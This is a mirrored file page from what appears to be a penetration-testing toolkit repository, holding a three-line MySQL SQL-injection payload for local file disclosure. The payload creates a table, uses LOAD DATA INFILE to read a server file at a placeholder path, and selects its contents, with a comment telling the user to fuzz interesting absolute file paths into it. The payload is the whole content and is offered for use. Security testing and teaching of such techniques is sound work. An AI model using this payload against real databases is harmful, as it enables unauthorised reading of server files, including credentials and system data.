mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 02:59:08 -04:00
4 lines
210 B
Plaintext
Executable File
4 lines
210 B
Plaintext
Executable File
# mysql local file disclosure through sqli
|
|
# fuzz interesting absolute filepath/filename into <filepath>
|
|
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|